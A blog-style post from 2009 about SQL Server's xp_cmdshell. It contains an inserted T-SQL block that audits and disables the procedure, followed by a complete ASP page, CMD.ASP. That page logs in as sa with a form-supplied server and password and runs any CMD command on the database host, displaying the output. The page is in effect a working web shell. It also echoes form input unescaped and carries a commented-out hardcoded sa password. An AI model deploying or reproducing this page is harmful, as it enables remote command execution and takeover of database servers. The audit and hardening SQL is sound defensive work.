Microsoft Study Bible

September 15, 2009

How to create the extended stored procedure XP_CMDSHELL

The extended stored procedure xp_cmdshell runs CMD commands on the database host and requires the logged-in user to hold SA (sysadmin) authority; in other words, once SA access to a SQL Server 2008 instance is obtained, anything can be done on the target machine. Some well-known software also uses this stored procedure to operate on the target machine.
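Because everything in this post hinges on xp_cmdshell being callable by an SA login, the check a DBA wants is whether it is enabled at all and who holds sysadmin. The T-SQL below is an added example, not code from the original post; it assumes you are connected to the instance with rights to read sys.configurations and run sp_configure (sysadmin or ALTER SETTINGS), and it does not assume any server name or password.

```sql
-- Added example (not from the original post): audit and disable xp_cmdshell.
-- Assumes a connection with sysadmin or ALTER SETTINGS rights.

-- 1. Current state: 'value' is the configured setting,
--    'value_in_use' is what the running instance actually honours.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 2. Logins that hold sysadmin. Each of these is effectively an "SA"
--    and can call xp_cmdshell once it is enabled.
SELECT p.name AS login_name, p.type_desc, p.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS p ON p.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';

-- 3. Turn xp_cmdshell off (the default since SQL Server 2005) and hide
--    the advanced options again afterwards.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 4. Verify: value_in_use should now be 0.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
```

Step 2 lists sysadmin members only; a login that is not sysadmin can still run xp_cmdshell if it has been granted EXECUTE on the procedure and a proxy account has been set with sp_xp_cmdshell_proxy_account, so that grant is worth checking as well. Disabling the option does not remove the procedure, it only makes calls fail until a sysadmin re-enables it, which is why the configuration change itself is the event to watch.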
A simple ASP page that calls it is shown below:

CMD.ASP
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>SQLSERVER_XP_CMDSHELL instance _ magician</title>
<style type="text/css">
<!--
body{
font-size:13px;
line-height:20px;
width:760px;
SCROLLBAR-FACE-COLOR: #2896e1;
SCROLLBAR-SHADOW-COLOR: #6cb4d8;
SCROLLBAR-ARROW-COLOR: #f0f0f0;
SCROLLBAR-DARKSHADOW-COLOR: #2896e1;
SCROLLBAR-BASE-COLOR: #2896e1;
background-image: url(images/bg.gif);
}
.LBR{
border-top:0px solid #336699;
border-left:1px solid #336699;
border-right:1px solid #336699;
border-bottom:1px solid #336699;
}
.all_h {
border: 1px solid #336699;
}
.input {
border: 1px solid #336699;
background-color:#ECEAFD;
}
.LB{
border-top:0px solid #336699;
border-left:1px solid #336699;
border-right:0px solid #336699;
border-bottom:1px solid #336699;
}
.N1 {font-weight:bold;color:#339933;font-size:13px;}
.N2 {font-weight:bold;color:#ff0000;font-size:13px;}
-->
</style>
</head>
<body>

<%if request("cmd")<>"" then%>
<table width=400  border=0 align=center cellpadding=5 cellspacing=0>
  <tr align=center>
    <td height=30  class=all_h bgcolor=#B3E0FF ><span class=N1>XP_CMDSHELL request the outcome</span></td>
  </tr>
  <%
dim connstr,conn,rs,i
' connect to the master database as sa with the server name and password taken from the form
ConnStr="Provider=sqloledb.1;persist security info=false;server="&request("server")&";uid=sa;pwd="&request("pwd")&";database=master"
'ConnStr="Provider=sqloledb.1;persist security info=false;server=(local);uid=sa;pwd=www.zhi.net;database=master"
set conn=Server.CreateObject("ADODB.Connection")
conn.open Connstr
set rs=server.CreateObject("ADODB.Recordset")
' single and double quotes are stripped from the command so it cannot break out of the T-SQL string literal
set rs=conn.execute("xp_cmdshell '"&replace(replace(request("cmd"),"'",""),chr(34),"")&"'")
i=0
' each row returned by xp_cmdshell is one line of command output; alternate the row colour
while not rs.eof
if not isnull(rs(0)) then
if i mod 2 =0 then
response.Write "<tr><td class=""LBR"" bgcolor=""#DEF3FF"">"&rs(0)&"</td></tr>"
else
response.Write "<tr><td class=""LBR"">"&rs(0)&"</td></tr>"
end if
i=i+1
end if
rs.movenext
wend
rs.close
set rs=nothing
conn.close
set conn=nothing
%>
</table>
<%end if%>
<form name="form1" method="post" action="">
  <table width=400  border=0 align=center cellpadding=5 cellspacing=0>
    <tr align=center>
      <td height=30 colspan=2  class=all_h bgcolor=#B3E0FF ><span class=N1>XP_CMDSHELL instance</span></td>
    </tr>
    <tr align=center bgcolor=#DEF3FF>
      <td width=26% class=LB><strong>Server</strong></td>
      <td width=74% class=LBR><div align="left">
          <input name="Server" type="text" id="Server" class="input" size="20" value="<%=request("Server")%>">
      </div></td>
    </tr>
    <tr align=center >
      <td   class=LB><b>SA password</b></td>
      <td   class=LBR><div align="left"><span class=N1>
          <input name="PWD" type="text" id="PWD" class="input" size="20" value="<%=request("PWD")%>">
      </span></div></td>
    </tr>
    <tr align=center bgcolor=#DEF3FF>
      <td width=26% class=LB><strong>CMD command</strong></td>
      <td width=74% class=LBR><div align="left">
          <input name="CMD" type="text" id="CMD" class="input" size="20" value="<%=request("CMD")%>">
      </div></td>
    </tr>
    <tr align=center >
      <td colspan="2"   class=LBR><div align="center"><b> </b>
              <input type="submit" name="Submit" value=" submit Command  " class="input">
      </div></td>
    </tr>
  </table>
</form>
</body>
</html>
